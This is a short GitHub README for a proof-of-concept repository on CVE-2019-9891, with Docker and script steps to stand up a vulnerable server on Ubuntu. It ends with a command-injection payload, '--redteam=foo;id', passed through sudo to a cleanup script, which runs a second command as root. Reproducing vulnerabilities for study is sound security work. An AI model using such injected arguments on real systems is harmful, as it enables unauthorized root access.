Skip to content

Latest commit

 

History

History
executable file
·
34 lines (23 loc) · 778 Bytes

README.md

File metadata and controls

executable file
·
34 lines (23 loc) · 778 Bytes

CVE-2019-9891

About

PoC / Exploit

Environment used

  • Ubuntu 18.04.4 LTS

Reproduction

  • Server
    • Docker version

      docker run --rm -p8022:22 -it simaofsilva/cve-2019-9891
    • Script version

      sudo bash Script_version/installation.sh
  • Client
    bash login.sh
    After login run sudo /usr/local/sbin/cleanup.sh '--redteam=foo;id' and you'll see the result of id command as root.